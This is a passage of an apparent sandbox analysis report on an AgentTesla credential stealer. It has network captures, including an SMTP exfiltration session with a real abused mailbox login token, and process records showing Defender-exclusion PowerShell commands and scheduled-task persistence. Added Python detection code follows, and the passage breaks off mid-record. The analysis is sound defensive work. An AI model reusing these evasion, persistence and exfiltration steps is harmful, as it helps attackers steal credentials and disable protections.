                                              Dec 19, 2024 10:28:36.195799112 CET | 53 | 65479 | 1.1.1.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:37.913604975 CET | 50075 | 53 | 192.168.2.10 | 1.1.1.1
                                              Dec 19, 2024 10:28:38.052536964 CET | 53 | 50075 | 1.1.1.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:39.924717903 CET | 65468 | 53 | 192.168.2.10 | 1.1.1.1
                                              Dec 19, 2024 10:28:40.330636024 CET | 53 | 65468 | 1.1.1.1 | 192.168.2.10
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Dec 19, 2024 10:28:36.059040070 CET | 192.168.2.10 | 1.1.1.1 | 0x23a5 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                              Dec 19, 2024 10:28:37.913604975 CET | 192.168.2.10 | 1.1.1.1 | 0xca47 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                              Dec 19, 2024 10:28:39.924717903 CET | 192.168.2.10 | 1.1.1.1 | 0x66 | Standard query (0) | mail.keeptraveling-eg.com | A (IP address) | IN (0x0001) | false
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Dec 19, 2024 10:28:36.195799112 CET | 1.1.1.1 | 192.168.2.10 | 0x23a5 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                              Dec 19, 2024 10:28:36.195799112 CET | 1.1.1.1 | 192.168.2.10 | 0x23a5 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                              Dec 19, 2024 10:28:36.195799112 CET | 1.1.1.1 | 192.168.2.10 | 0x23a5 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                              Dec 19, 2024 10:28:38.052536964 CET | 1.1.1.1 | 192.168.2.10 | 0xca47 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                              Dec 19, 2024 10:28:40.330636024 CET | 1.1.1.1 | 192.168.2.10 | 0x66 | No error (0) | mail.keeptraveling-eg.com | | 162.241.224.14 | A (IP address) | IN (0x0001) | false
                                              • api.ipify.org
                                              • ip-api.com
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.10 | 49712 | 208.95.112.1 | 80 | 7048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Dec 19, 2024 10:28:38.173309088 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                              Host: ip-api.com
                                              Connection: Keep-Alive
                                              Dec 19, 2024 10:28:39.324820995 CET | 175 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 19 Dec 2024 09:28:38 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 6
                                              Access-Control-Allow-Origin: *
                                              X-Ttl: 60
                                              X-Rl: 44
                                              Data Raw: 66 61 6c 73 65 0a
                                              Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49716 | 208.95.112.1 | 80 | 2788 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 10:28:46.175503969 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 19, 2024 10:28:47.324632883 CET | 175 | IN | HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 09:28:46 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 51
X-Rl: 43
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49711 | 104.26.13.205 | 443 | 7048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 09:28:37 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-12-19 09:28:37 UTC | 424 | IN | HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 09:28:37 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8f465d13dbf27292-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1990&rtt_var=761&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1423695&cwnd=252&unsent_bytes=0&cid=3777f1ce7e43ddce&ts=464&x=0"
2024-12-19 09:28:37 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
Data Ascii: 8.46.123.189


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49714 | 104.26.13.205 | 443 | 2788 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 09:28:45 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-12-19 09:28:46 UTC | 424 | IN | HTTP/1.1 200 OK
Date: Thu, 19 Dec 2024 09:28:45 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8f465d46bf8578ed-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1961&rtt_var=740&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1474747&cwnd=182&unsent_bytes=0&cid=7f54d317c868288f&ts=447&x=0"
2024-12-19 09:28:46 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
Data Ascii: 8.46.123.189


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Dec 19, 2024 10:28:41.626859903 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10 | 220-box5147.bluehost.com ESMTP Exim 4.96.2 #2 Thu, 19 Dec 2024 02:28:41 -0700
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Dec 19, 2024 10:28:41.627088070 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14 | EHLO 960781
Dec 19, 2024 10:28:41.992829084 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10 | 250-box5147.bluehost.com Hello 960781 [8.46.123.189]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Dec 19, 2024 10:28:41.993706942 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14 | AUTH login ZG9uaWFAa2VlcHRyYXZlbGluZy1lZy5jb20=
Dec 19, 2024 10:28:42.362397909 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10 | 334 UGFzc3dvcmQ6
Dec 19, 2024 10:28:42.846374035 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10 | 235 Authentication succeeded
Dec 19, 2024 10:28:42.846599102 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14 | MAIL FROM:<donia@keeptraveling-eg.com>
Dec 19, 2024 10:28:43.212127924 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10 | 250 OK
Dec 19, 2024 10:28:43.218147993 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14 | RCPT TO:<mail@keeptraveling-eg.com>
Dec 19, 2024 10:28:43.591236115 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10 | 250 Accepted
Dec 19, 2024 10:28:49.322812080 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10 | 220-box5147.bluehost.com ESMTP Exim 4.96.2 #2 Thu, 19 Dec 2024 02:28:48 -0700
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Dec 19, 2024 10:28:49.323024988 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14 | EHLO 960781
Dec 19, 2024 10:28:49.694004059 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10 | 250-box5147.bluehost.com Hello 960781 [8.46.123.189]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Dec 19, 2024 10:28:49.694305897 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14 | AUTH login ZG9uaWFAa2VlcHRyYXZlbGluZy1lZy5jb20=
Dec 19, 2024 10:28:50.062462091 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10 | 334 UGFzc3dvcmQ6
Dec 19, 2024 10:28:50.438704014 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10 | 235 Authentication succeeded
Dec 19, 2024 10:28:50.438916922 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14 | MAIL FROM:<donia@keeptraveling-eg.com>
Dec 19, 2024 10:28:50.804887056 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10 | 250 OK
Dec 19, 2024 10:28:50.805187941 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14 | RCPT TO:<mail@keeptraveling-eg.com>
Dec 19, 2024 10:28:51.177762032 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10 | 250 Accepted
Dec 19, 2024 10:28:51.191715002 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14 | DATA
Dec 19, 2024 10:28:51.557792902 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10 | 354 Enter message, ending with "." on a line by itself
Dec 19, 2024 10:28:51.558602095 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14 | .
Dec 19, 2024 10:28:52.020623922 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10 | 250 OK id=1tOCpv-0027gw-1C
Dec 19, 2024 10:30:27.910811901 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14 | QUIT
Dec 19, 2024 10:30:28.488471031 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10 | 221 box5147.bluehost.com closing connection
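The SMTP dialogue above is the exfiltration channel, and the two HTTP requests before it are the sample's checks of its own public IP (api.ipify.org) and of whether that IP belongs to a hosting provider (ip-api.com with fields=hosting, answered "false", so the sample assumed it was not in a sandbox and went on). The Python below is added here as an example and is not part of the Joe Sandbox report: it decodes the AUTH LOGIN token to recover the abused mailbox, pulls sender, recipient and queue id out of the dialogue, records that the credential was sent before any STARTTLS (which is why the sandbox could read it), and flags the IP-lookup, hosting-check, SMTP sequence per PID. The session rows and the per-process event list are constructed copies of the tables above (the PID 4242 row is invented benign noise); the client's password line is not in the capture and is not reproduced.

```python
"""Triage of the captured AgentTesla network transcript: decode the SMTP AUTH LOGIN
exchange and flag the public-IP lookup -> hosting check -> SMTP sequence per process.
Example code, not part of the sandbox report; all input is a constructed copy."""
import base64
import re
from collections import defaultdict

SMTP_PORTS = {25, 465, 587}

# Second SMTP session (client port 49718) as (src_port, dst_port, text). The client's
# password line is not shown in the capture, so it is not reproduced here.
SMTP_SESSION = [
    (587, 49718, "220-box5147.bluehost.com ESMTP Exim 4.96.2 #2 Thu, 19 Dec 2024 02:28:48 -0700"),
    (49718, 587, "EHLO 960781"),
    (587, 49718, "250-box5147.bluehost.com Hello 960781 [8.46.123.189]"),
    (587, 49718, "250-AUTH PLAIN LOGIN"),
    (587, 49718, "250-STARTTLS"),
    (587, 49718, "250 HELP"),
    (49718, 587, "AUTH login ZG9uaWFAa2VlcHRyYXZlbGluZy1lZy5jb20="),
    (587, 49718, "334 UGFzc3dvcmQ6"),
    (587, 49718, "235 Authentication succeeded"),
    (49718, 587, "MAIL FROM:<donia@keeptraveling-eg.com>"),
    (587, 49718, "250 OK"),
    (49718, 587, "RCPT TO:<mail@keeptraveling-eg.com>"),
    (587, 49718, "250 Accepted"),
    (49718, 587, "DATA"),
    (587, 49718, '354 Enter message, ending with "." on a line by itself'),
    (49718, 587, "."),
    (587, 49718, "250 OK id=1tOCpv-0027gw-1C"),
    (49718, 587, "QUIT"),
]

# Per-process events (seconds after start, pid, kind, detail) taken from the DNS, HTTP
# and SMTP tables; the PID 4242 row is constructed benign noise.
NET_EVENTS = [
    (9, 7048, "dns", "api.ipify.org"),
    (10, 7048, "http", "api.ipify.org GET / -> 8.46.123.189"),
    (12, 7048, "http", "ip-api.com GET /line/?fields=hosting -> false"),
    (13, 7048, "dns", "mail.keeptraveling-eg.com"),
    (15, 7048, "smtp", "AUTH LOGIN to 162.241.224.14:587"),
    (40, 4242, "dns", "www.example.com"),
]


def b64_text(token):
    """Decode one base64 token of an SMTP AUTH LOGIN exchange (user, then password)."""
    return base64.b64decode(token, validate=True).decode("utf-8", "replace")


def triage_smtp(session):
    """Extract mailbox, recipients, queue id and TLS state from an SMTP dialogue.
    A row whose source port is an SMTP port was sent by the server."""
    info = {"server": None, "ehlo": None, "auth_user": None, "auth_ok": False,
            "starttls_before_auth": False, "mail_from": None, "rcpt_to": [], "queue_id": None}
    tls_started = False
    for src, _dst, text in session:
        if src in SMTP_PORTS:                       # server -> client
            if text.startswith("220") and info["server"] is None:
                info["server"] = text[4:].split()[0]
            elif text.startswith("235"):
                info["auth_ok"] = True
            else:
                m = re.match(r"250 OK id=(\S+)", text)
                if m:
                    info["queue_id"] = m.group(1)
            continue
        verb, _, arg = text.partition(" ")          # client -> server
        verb = verb.upper()
        if verb in ("EHLO", "HELO"):
            info["ehlo"] = arg
        elif verb == "STARTTLS":
            tls_started = True
        elif verb == "AUTH" and arg.upper().startswith("LOGIN"):
            parts = arg.split()                     # "LOGIN <base64 user>" when the user is sent inline
            info["auth_user"] = b64_text(parts[1]) if len(parts) > 1 else None
            info["starttls_before_auth"] = tls_started   # False here: credential crossed in cleartext
        elif verb in ("MAIL", "RCPT"):
            m = re.search(r"<([^>]*)>", arg)
            if m and verb == "MAIL":
                info["mail_from"] = m.group(1)
            elif m:
                info["rcpt_to"].append(m.group(1))
    return info


def flag_exfil_sequence(events, window=60):
    """Flag a PID that learns its public IP, asks ip-api.com whether that IP belongs to
    a hosting provider (the sandbox check) and then authenticates to SMTP within `window` s."""
    by_pid = defaultdict(list)
    for ts, pid, kind, detail in sorted(events):
        by_pid[pid].append((ts, kind, detail))
    hits = {}
    for pid, evs in by_pid.items():
        ip_ts = next((ts for ts, k, d in evs if k == "http" and d.startswith("api.ipify.org")), None)
        host = next(((ts, d) for ts, k, d in evs if k == "http" and "fields=hosting" in d), None)
        smtp_ts = next((ts for ts, k, d in evs if k == "smtp"), None)
        if None not in (ip_ts, host, smtp_ts) and ip_ts <= host[0] <= smtp_ts <= ip_ts + window:
            hits[pid] = {"hosting_answer": host[1].rsplit("-> ", 1)[-1], "span_s": smtp_ts - ip_ts}
    return hits
```

triage_smtp(SMTP_SESSION) yields the mailbox donia@keeptraveling-eg.com authenticating from host name 960781, mail to mail@keeptraveling-eg.com and queue id 1tOCpv-0027gw-1C, with starttls_before_auth False; flag_exfil_sequence(NET_EVENTS) returns only PID 7048. The ordering check (IP lookup, then hosting check, then SMTP) is what keeps an ordinary mail client that happens to visit ip-api.com out of the hits.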


                                              Target ID:0
                                              Start time:04:28:27
                                              Start date:19/12/2024
                                              Path:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DHL_231437894819.bat.exe"
                                              Imagebase:0x830000
                                              File size:835'080 bytes
                                              MD5 hash:5D1D0F26EBB26738D78E964C0A57DE2D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1468443029.000000000478A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:3
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"
                                              Imagebase:0xa20000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:4
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:5
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"
                                              Imagebase:0xa20000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:6
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"
                                              Imagebase:0xf20000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:04:28:32
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:04:28:33
                                              Start date:19/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x330000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:04:28:33
                                              Start date:19/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x920000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1534737744.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1534737744.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1528458706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:04:28:35
                                              Start date:19/12/2024
                                              Path:C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                                              Imagebase:0xc90000
                                              File size:835'080 bytes
                                              MD5 hash:5D1D0F26EBB26738D78E964C0A57DE2D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1557165401.00000000049BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1557165401.0000000004B47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 71%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:12
                                              Start time:04:28:36
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                              Imagebase:0x7ff6616b0000
                                              File size:496'640 bytes
                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                              Has elevated privileges:true
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:04:28:41
                                              Start date:19/12/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp"
                                              Imagebase:0xf20000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:14
                                              Start time:04:28:41
                                              Start date:19/12/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:15
                                              Start time:04:28:41
                                              Start date:19/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0xa0000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:16
                                              Start time:04:28:41
                                              Start date:19/12/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0xb90000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3853312298.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3853312298.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3853312298.0000000002E66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3853312298.0000000002E34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:false
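The process list above shows the persistence and evasion chain: two PowerShell runs of Add-MpPreference -ExclusionPath (one for the original sample, one for the copy in AppData\Roaming), two schtasks /Create calls fed an XML definition from the user's Temp directory, RegSvcs.exe launched without the assembly argument it normally requires (the injection host), and uvbIwIYe.exe carrying the same MD5 as the sample on the Desktop. The Python below is an added example, not part of the report, that runs those four checks over a constructed copy of the Target entries. It also decodes -EncodedCommand (base64 of UTF-16LE) so the same exclusion hidden behind an encoded command line is caught; that record (Target ID 99) is constructed and does not appear in the report.

```python
"""Four checks over process-creation records, run against a constructed copy of the
Target entries above (example code, not part of the sandbox report)."""
import base64
import re
from collections import defaultdict

# Constructed from the Target entries: Target ID, image path, command line, MD5.
PROCESS_RECORDS = [
    {"id": 0, "path": r"C:\Users\user\Desktop\DHL_231437894819.bat.exe",
     "cmdline": r'"C:\Users\user\Desktop\DHL_231437894819.bat.exe"',
     "md5": "5D1D0F26EBB26738D78E964C0A57DE2D"},
    {"id": 3, "path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_231437894819.bat.exe"',
     "md5": "C32CA4ACFCC635EC1EA6ED8A34DF5FAC"},
    {"id": 4, "path": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "md5": "0D698AF330FD17BEE3BF90011D49251D"},
    {"id": 5, "path": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uvbIwIYe.exe"',
     "md5": "C32CA4ACFCC635EC1EA6ED8A34DF5FAC"},
    {"id": 7, "path": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp1E51.tmp"',
     "md5": "48C2FE20575769DE916F48EF0676A965"},
    {"id": 10, "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"',
     "md5": "9D352BC46709F0CB5EC974633A0C3C94"},
    {"id": 11, "path": r"C:\Users\user\AppData\Roaming\uvbIwIYe.exe",
     "cmdline": r"C:\Users\user\AppData\Roaming\uvbIwIYe.exe",
     "md5": "5D1D0F26EBB26738D78E964C0A57DE2D"},
    {"id": 13, "path": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uvbIwIYe" /XML "C:\Users\user\AppData\Local\Temp\tmp40DD.tmp"',
     "md5": "48C2FE20575769DE916F48EF0676A965"},
    {"id": 16, "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
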